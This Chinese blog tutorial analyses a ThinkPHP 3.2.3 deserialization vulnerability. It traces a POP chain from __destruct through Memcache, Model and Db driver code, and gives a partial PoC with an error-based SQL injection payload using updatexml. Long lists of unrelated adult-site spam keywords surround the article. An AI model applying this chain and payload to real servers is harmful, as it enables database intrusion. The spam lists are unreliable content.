日本不卡不码高清免费观看,久久国产精品久久w女人spa,黄色aa久久,三上悠亚国产精品一区二区三区

您的位置:首頁技術文章
文章詳情頁

Thinkphp3.2.3反序列化漏洞實例分析

瀏覽:228日期:2022-06-06 15:16:40
目錄
  • 前言
  • 魔術方法
  • 復現
  • 結語

前言

ThinkPHP,是為了簡化企業級應用開發和敏捷WEB應用開發而誕生的開源輕量級PHP框架。隨著框架代碼量的增加,一些潛在的威脅也逐漸暴露,本文給大家帶來的是對Thinkphp3.2.3版本框架里面的反序列化漏洞進行分析,淺談原理以及如何應用。

魔術方法

因為之前已經講過了,這里就簡單提一下,以下面這個魔術方法為例:

_destruct

該方法的作用是,某個對象的所有引用都被刪除或者當對象被顯式銷毀時執行。例如下面代碼:

<?phpclass User{    public function __destruct()    {echo "xino</br>";    }}$test = new User();$ser = serialize($test);unserialize($ser);?>

執行后會發現調用了魔術方法,我們要想辦法來尋找代碼之間的關系來構造 反序列化鏈,常見魔術方法如下:

了解完魔術方法如何觸發后便開始我們TP3反序列化漏洞的學習之旅。

復現

這里我是用小皮面板搭建好環境后開始我們的分析,下面是主界面:

需要在控制器IndexController.class.php 處寫入:

public function index(){    unserialize(base64_decode($_GET[1]));}

首先走到Library/Think/Image/Driver/Imagick.class.php ,代碼如下:

 public function __destruct()    {empty($this->img) || $this->img->destroy();    }}

這里有一個可控的變量img,因為該變量走向了destory(),于是我們尋找一下:

Library/Think/Session/Driver/Memcache.class.php ,該處有個一樣的方法:

 public function destroy($sessID)    {return $this->handle->delete($this->sessionName . $sessID);    }

我們會發現handle和sessionName參數是可控,因為走向了delete函數,于是繼續跟進尋找delete,在Mode/Lite/Model.class.php 處:

   public function delete($options = array())    {$pk = $this->getPk();if (empty($options) && empty($this->options["where"])) {    // 如果刪除條件為空 則刪除當前數據對象所對應的記錄    if (!empty($this->data) && isset($this->data[$pk])) {return $this->delete($this->data[$pk]);    } else {return false;    }}if (is_numeric($options) || is_string($options)) {    // 根據主鍵刪除記錄    if (strpos($options, ",")) {$where[$pk] = array("IN", $options);    } else {$where[$pk] = $options;    }    $options  = array();    $options["where"] = $where;}// 根據復合主鍵刪除記錄if (is_array($options) && (count($options) > 0) && is_array($pk)) {    $count = 0;    foreach (array_keys($options) as $key) {if (is_int($key)) {    $count++;}    }    if (count($pk) == $count) {$i = 0;foreach ($pk as $field) {    $where[$field] = $options[$i];    unset($options[$i++]);}$options["where"] = $where;    } else {return false;    }}// 分析表達式$options = $this->_parseOptions($options);if (empty($options["where"])) {    // 如果條件為空 不進行刪除操作 除非設置 1=1    return false;}if (is_array($options["where"]) && isset($options["where"][$pk])) {    $pkValue = $options["where"][$pk];}if (false === $this->_before_delete($options)) {    return false;}$result = $this->db->delete($options);		//數據庫驅動類中的delete()if (false !== $result && is_numeric($result)) {    $data = array();    if (isset($pkValue)) {$data[$pk] = $pkValue;    }    $this->_after_delete($data, $options);}// 返回刪除記錄個數return $result;    }

這里比較復雜,需要分析一下,pk,pk,pk,data,$options參數都是可控的,第二次調用該函數后是調用db(Library/Think/Db/Driver.class.php )里面的函數,進去看一下:

$table = $this-&gt;parseTable($options["table"]);$sql   = "DELETE FROM " . $table;return $this-&gt;execute($sql, !empty($options["fetch_sql"]) ? true : false);

這里只貼了比較關鍵的代碼,看到table經過parseTable處理之后進了sql語句,跟進了發現沒有過濾什么,直接返回了數據,最后調用了execute,我們分析其代碼:

 public function execute($str,$fetchSql=false) {$this->initConnect(true);if ( !$this->_linkID ) return false;$this->queryStr = $str;if(!empty($this->bind)){    $that   =   $this;    $this->queryStr =   strtr($this->queryStr,array_map(function($val) use($that){ return """.$that->escapeString($val)."""; },$this->bind));}if($fetchSql){    return $this->queryStr;}

看到第二行是一個初始化連接的代碼,我們跟進到最后發現:

 public function connect($config = "", $linkNum = 0, $autoConnection = false)    {if (!isset($this->linkID[$linkNum])) {    if (empty($config)) {$config = $this->config;    }    try {if (empty($config["dsn"])) {    $config["dsn"] = $this->parseDsn($config);}if (version_compare(PHP_VERSION, "5.3.6", "<=")) {    // 禁用模擬預處理語句    $this->options[PDO::ATTR_EMULATE_PREPARES] = false;}$this->linkID[$linkNum] = new PDO($config["dsn"], $config["username"], $config["password"], $this->options);    } catch (\PDOException $e) {if ($autoConnection) {    trace($e->getMessage(), "", "ERR");    return $this->connect($autoConnection, $linkNum);} elseif ($config["debug"]) {    E($e->getMessage());}    }}return $this->linkID[$linkNum];    }

可以通過里面的相應代碼:

$this->config

建立數據庫連接,整個的POP鏈跟進順序如下:

__destruct()->destroy()->delete()->Driver::delete()->Driver::execute()->Driver::initConnect()->Driver::connect()->

因為構造poc較長,這里只貼關鍵處,有興趣的小伙伴可以自行去構造:

  public function __construct(){    $this->db = new Mysql();    $this->options["where"] = "";    $this->pk = "id";    $this->data[$this->pk] = array("table" => "name where 1=updatexml(1,user(),1)#","where" => "1=1"    ); }

生成后傳入payload即可實現錯報注入,體現在payload里就是table這個語句,經過一串的操作使之與數據庫連接來執行sql語句:

結語

給大家帶來了tp3的反序列化漏洞分析,主要還是要理清各個鏈的關系以及如何讓它們聯系起來,有興趣的小伙伴可以自己去搭建嘗試,喜歡本文的小伙伴希望可以一鍵三連支持一下。

以上就是Thinkphp3.2.3反序列化漏洞實例分析的詳細內容,更多關于Thinkphp 反序列化漏洞的資料請關注其它相關文章!

標簽: PHP
日本不卡不码高清免费观看,久久国产精品久久w女人spa,黄色aa久久,三上悠亚国产精品一区二区三区
综合精品一区| 日韩中文欧美在线| 精品中文字幕一区二区三区av| 国产v综合v| 久久亚洲精品中文字幕蜜潮电影| 欧美极品中文字幕| 亚洲人成毛片在线播放女女| 亚洲精品**中文毛片| 日韩手机在线| 日韩精品一二三区| 99国产精品久久久久久久| 欧美丝袜一区| 91精品在线观看国产| 九色porny丨国产首页在线| zzzwww在线看片免费| 鲁鲁在线中文| 国产不卡人人| 激情黄产视频在线免费观看| 精品久久电影| 国产精品久久久久久av公交车| 亚洲18在线| 中文字幕日本一区二区| 丝袜美腿高跟呻吟高潮一区| 中国女人久久久| 好吊日精品视频| 午夜国产一区二区| 99视频+国产日韩欧美| 国产一区日韩一区| 99久久九九| japanese国产精品| 视频一区二区三区入口| 成人精品高清在线视频| 91偷拍一区二区三区精品| 国产专区精品| 精品国产午夜| 超碰成人av| 久久精品成人| 一区久久精品| 视频一区二区欧美| 日本综合视频| 欧美日韩一视频区二区| 国产精品麻豆成人av电影艾秋 | 国产亚洲一级| 麻豆亚洲精品| 欧美在线黄色| 免费一级欧美片在线观看网站 | 久久亚洲成人| 国产一区二区精品| 日韩和欧美一区二区三区| 国产视频网站一区二区三区| 久久久久亚洲精品中文字幕| 不卡专区在线| 日韩午夜电影| 麻豆国产欧美一区二区三区 | 啪啪国产精品| 亚洲激情精品| 日韩极品在线观看| 精品视频在线一区二区在线| 精品亚洲美女网站| 日韩午夜在线| 蜜桃视频在线观看一区二区| 日韩极品在线观看| 国产精品网在线观看| 欧美国产视频| 91看片一区| 在线精品福利| 麻豆精品一区二区综合av| 国产美女高潮在线| 免费在线观看成人| 日韩不卡手机在线v区| 国产66精品| 久久亚洲视频| 久久精品国产一区二区| 久久九九精品| 日韩在线网址| 四虎国产精品免费观看| 99成人在线| 国产精品啊v在线| 影视先锋久久| 国产日韩一区二区三区在线| 国产一区日韩一区| 国产图片一区| 国产综合婷婷| 国产欧美在线| 91精品久久久久久久久久不卡| 亚洲三级av| 日韩国产在线| 亚洲精品在线二区| 欧美精品高清| 欧美另类中文字幕| 欧美精品一二| 欧美激情视频一区二区三区免费 | 亚洲日本网址| 日韩在线电影| 久久久久久久久丰满| 国产麻豆一区二区三区| 2023国产精品久久久精品双| 日韩av中文字幕一区二区三区| 日韩三区在线| 国产精久久久| 亚洲69av| 午夜久久久久| 日韩av片子| 日本中文字幕一区二区| 久久伦理在线| 精品一区二区三区中文字幕| 日韩中文欧美在线| 精品亚洲自拍| 日本中文字幕一区二区视频| 国产91一区| av中文字幕在线观看第一页| 国产日韩欧美三级| 国产模特精品视频久久久久| 亚洲国内欧美| 国产a亚洲精品| 精品少妇一区| 国产精品中文字幕制服诱惑| 伊人久久成人| 一区二区小说| 精品资源在线| 国产精品一区二区精品视频观看| 男女男精品网站| 久久国产中文字幕| 性一交一乱一区二区洋洋av| 国产成年精品| 国产精品最新自拍| 亚洲精选91| 午夜久久中文| 91亚洲一区| 亚洲天堂黄色| 国产福利资源一区| 亚洲精品国产精品粉嫩| 在线看片福利| 蘑菇福利视频一区播放| 中文字幕在线看片| 精品一级视频| 亚洲精品人人| 尤物精品在线| 国产精品视频一区视频二区| 日韩国产精品久久久| 日韩精选在线| 亚洲深爱激情| 久久精品国产99久久| 综合激情一区| 精品欧美日韩精品| 9国产精品视频| 亚洲精品伊人| 老司机精品视频在线播放| 日韩国产在线观看一区| 女人av一区| 国产精品久久久久蜜臀 | 麻豆国产欧美一区二区三区| 成人日韩av| 国产91精品对白在线播放| 好吊日精品视频| 亚洲免费一区二区| 国产亚洲高清在线观看| 超碰成人av| 欧美资源在线| 久久av影视| 久久精品av| 日韩精选在线| 正在播放日韩精品| 久久成人亚洲| 蜜桃av一区二区| 日本亚洲视频| 国产福利91精品一区二区| 五月天激情综合网| 四虎精品永久免费| 都市激情国产精品| 欧美日韩一区二区三区视频播放| 欧美在线综合| 国产韩日影视精品| 中文字幕色婷婷在线视频| 国产亚洲高清一区| 亚洲精品美女91| 蜜桃视频在线观看一区| 999国产精品999久久久久久| 国产精品成久久久久| 久久av导航| 日韩在线视频一区二区三区| 蜜臀av一区二区三区| 日韩中文字幕91| 亚洲精品成a人ⅴ香蕉片| 亚洲精品小说| 91亚洲人成网污www| 欧美日韩一区二区三区视频播放| 新版的欧美在线视频| 久久精品导航| 蘑菇福利视频一区播放| 国产成人久久精品麻豆二区 | 麻豆成人在线| 麻豆成人综合网| 在线亚洲国产精品网站| 国产精品九九| 天堂成人国产精品一区| 国产日韩亚洲欧美精品| 91久久在线| 久久久久久夜| 日本精品在线播放|